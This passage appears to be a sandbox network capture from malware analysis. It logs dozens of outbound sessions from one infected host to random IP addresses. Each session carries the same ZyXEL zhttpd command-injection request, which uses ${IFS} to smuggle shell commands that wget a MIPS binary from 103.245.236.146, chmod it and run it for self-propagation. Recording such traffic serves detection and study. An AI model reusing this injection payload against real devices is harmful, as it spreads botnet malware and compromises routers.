                                                Jan 28, 2024 10:16:41.049285889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8430192.168.2.2337666113.180.53.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049313068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8431192.168.2.2334950108.98.235.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049329996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8432192.168.2.2332916169.226.220.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049351931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8433192.168.2.233284438.109.57.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049392939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8434192.168.2.2349672211.125.231.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049437046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8435192.168.2.235949265.141.93.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049448967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8436192.168.2.2356044183.188.14.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049479008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8437192.168.2.234300692.210.220.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049510002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8438192.168.2.2349888187.117.243.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049540043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8439192.168.2.234946285.53.77.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049552917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8440192.168.2.2346436124.92.227.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049582005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8441192.168.2.2338018166.25.6.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049618006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8442192.168.2.2336618218.184.110.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049652100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8443192.168.2.235769057.5.46.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049664974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8444192.168.2.235471814.189.66.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049686909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8445192.168.2.23514925.240.214.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049710035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8446192.168.2.2345804133.36.235.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049746990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8447192.168.2.2343778212.171.121.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049760103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8448192.168.2.235410812.230.207.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049782038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8449192.168.2.2344570123.133.70.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049806118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8450192.168.2.234813618.19.0.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049834967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8451192.168.2.235031440.53.121.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049838066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8452192.168.2.234983879.48.151.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049868107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8453192.168.2.2350804177.131.192.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049880981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8454192.168.2.2358922128.191.90.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049892902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8455192.168.2.2335556208.199.206.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049947977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8456192.168.2.2344838135.137.125.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049972057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8457192.168.2.2339848119.151.141.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050014973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8458192.168.2.234329658.52.79.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050050020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8459192.168.2.2348900145.175.109.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050061941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8460192.168.2.235331465.2.74.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050076962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8461192.168.2.2340480181.50.12.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050082922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8462192.168.2.235365239.248.221.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050121069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8463192.168.2.234345860.82.131.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050122023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8464192.168.2.2335338142.229.130.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050158978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8465192.168.2.235119694.175.56.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050167084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8466192.168.2.2345794151.83.60.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050200939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8467192.168.2.2353046181.179.117.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050215006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8468192.168.2.2335186183.50.35.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050245047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8469192.168.2.233720054.18.209.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050256968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8470192.168.2.2339896182.139.129.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050275087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8471192.168.2.2358280162.174.250.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050319910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8472192.168.2.2341110168.90.248.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050321102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8473192.168.2.235595287.153.0.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050352097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8474192.168.2.234405651.87.230.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050381899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8475192.168.2.2352720133.33.244.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050412893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8476192.168.2.2347776200.36.136.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050440073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8477192.168.2.233691657.206.59.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050477028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8478192.168.2.233960623.111.14.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050524950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8479192.168.2.2338414206.134.187.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050555944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8480192.168.2.234934824.110.180.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050559044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8481192.168.2.235517884.175.10.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050585985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8482192.168.2.2343556130.171.21.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050622940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8483192.168.2.235544848.200.110.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050654888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8484192.168.2.2350408131.191.229.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050678015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8485192.168.2.2333972206.179.93.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050707102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8486192.168.2.2344186205.10.170.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050730944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8487192.168.2.2332834124.252.195.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050755024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8488192.168.2.2346796163.253.124.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050779104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8489192.168.2.2340328102.208.131.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050816059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8490192.168.2.235645281.230.139.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.050863028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8491192.168.2.23343489.228.39.3443
                                                TimestampBytes transferredDirectionData
